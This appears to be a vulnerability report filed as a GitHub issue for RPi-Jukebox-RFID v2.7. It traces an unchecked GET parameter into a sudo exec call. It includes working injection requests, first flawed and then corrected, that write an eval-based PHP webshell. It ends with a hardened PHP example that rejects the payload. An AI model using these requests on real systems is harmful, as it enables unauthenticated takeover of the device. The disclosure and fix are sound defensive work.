Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\api\playlist\appendFileToPlaylist.php

```php
# htdocs\api\playlist\appendFileToPlaylist.php
$file = $_GET["file"]; // Line 26 (Source)
if ($file !== "") {
    print "Playing file " . $file;
    execScriptWithoutCheck("playout_controls.sh -c=playlistappend -v='$file'"); // Line 29 (Sink)
}
```

```php
# htdocs\api\common.php
exec("sudo " . $absoluteCommand); // Line 25 (Sink)
```

Source: Line 26 ($_GET['file']). After that there is no check point.
Finally, the tainted source is passed to exec("sudo ".$absoluteCommand); (Line 25 in htdocs\api\common.php) without any further check.

Poc

```
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello
```

Here is the version without URL encoding for ease of understanding:

```
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval($_POST['pass']) ?>" > ./shell2.php ; echo 'hello
```

Manual verification

The attacker can then easily connect to this webshell (/htdocs/api/playlist/shell2.php).

Logs
No response
Configuration
No response
More info
No response

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

Poc_fixed

```
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello%27+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell2%27%5d)+%3f%3e%22++%3e+.%2fshell2.php++%3b+echo+%27hello
```

Here is the data without URL encoding for ease of understanding:

```
GET /htdocs/api/playlist/appendFileToPlaylist.php?file=hello' ; echo "<?php @eval(\$_POST['shell2']) ?>" > ./shell2.php ; echo 'hello
```
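What a fix for this sink would look like, as an added example written for this issue and not code from RPi-Jukebox-RFID: the vulnerable string construction from appendFileToPlaylist.php next to a hardened builder that allow-lists the file name, refuses traversal, confirms the file exists under an assumed audio root, and quotes the argument with escapeshellarg(). The names vulnerableCommand and buildAppendCommand, the audio-root layout and the demo inputs are hypothetical; the payload string is the report's fixed PoC, URL-decoded.

```php
<?php
// Added example for this issue, not code from RPi-Jukebox-RFID.
// Function names and the audio-root layout are hypothetical.
declare(strict_types=1);

// Vulnerable pattern from appendFileToPlaylist.php: the raw GET parameter
// is spliced into a single-quoted shell argument, so a literal ' in the
// input closes the quote and a following ; starts a second command.
function vulnerableCommand(string $file): string
{
    return "playout_controls.sh -c=playlistappend -v='$file'";
}

// Hardened builder: allow-list the characters, refuse traversal, confirm
// the file resolves inside $audioRoot, then quote it for the shell.
function buildAppendCommand(string $file, string $audioRoot): string
{
    if ($file === '' || strlen($file) > 4096) {
        throw new InvalidArgumentException('empty or oversized file name');
    }
    // Relative path built from segments of letters, digits, space, . _ -
    if (!preg_match('~\A(?:[A-Za-z0-9 ._-]+/)*[A-Za-z0-9 ._-]+\z~', $file)) {
        throw new InvalidArgumentException('disallowed characters in file name');
    }
    // The allow-list still permits a ".." segment; reject it explicitly.
    if (preg_match('~(?:\A|/)\.\.(?:/|\z)~', $file)) {
        throw new InvalidArgumentException('path traversal rejected');
    }
    $rootReal = realpath($audioRoot);
    $real = realpath($audioRoot . '/' . $file);
    if ($rootReal === false || $real === false
        || strpos($real, $rootReal . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('file does not exist under the audio root');
    }
    // escapeshellarg() wraps the value in single quotes and escapes any
    // embedded quote, so the shell sees exactly one argument.
    return 'playout_controls.sh -c=playlistappend -v=' . escapeshellarg($file);
}

// Constructed demo environment: a throwaway audio root with one track.
$root = sys_get_temp_dir() . '/jukebox-demo-' . getmypid();
mkdir($root . '/audio', 0700, true);
touch($root . '/audio/song.mp3');

// The report's fixed PoC payload, URL-decoded.
$payload = "hello' ; echo \"<?php @eval(\\\$_POST['shell2']) ?>\" > ./shell2.php ; echo 'hello";

// With the vulnerable builder the ' after "hello" terminates -v='...'
// and everything after the ; is executed as its own (sudo) command.
echo "vulnerable: ", vulnerableCommand($payload), "\n";

// The hardened builder accepts the real track and rejects the payload,
// a traversal attempt and a file that does not exist under the root.
foreach (['song.mp3', $payload, '../audio/song.mp3', 'missing.mp3'] as $input) {
    try {
        echo "hardened:   ", buildAppendCommand($input, $root . '/audio'), "\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected:   ", $e->getMessage(), "\n";
    }
}

// Clean up the constructed environment.
unlink($root . '/audio/song.mp3');
rmdir($root . '/audio');
rmdir($root);
```

Run it with `php example.php`. The allow-list and realpath() check are what keep the parameter a file inside the media folder; escapeshellarg() alone would stop the quote-breaking shown in the PoC but would still let `../` reach files outside the root. Both checks only harden this sink: the quoted value is still handed to a script run through sudo, so playout_controls.sh must continue to treat `-v` as data and never re-evaluate it.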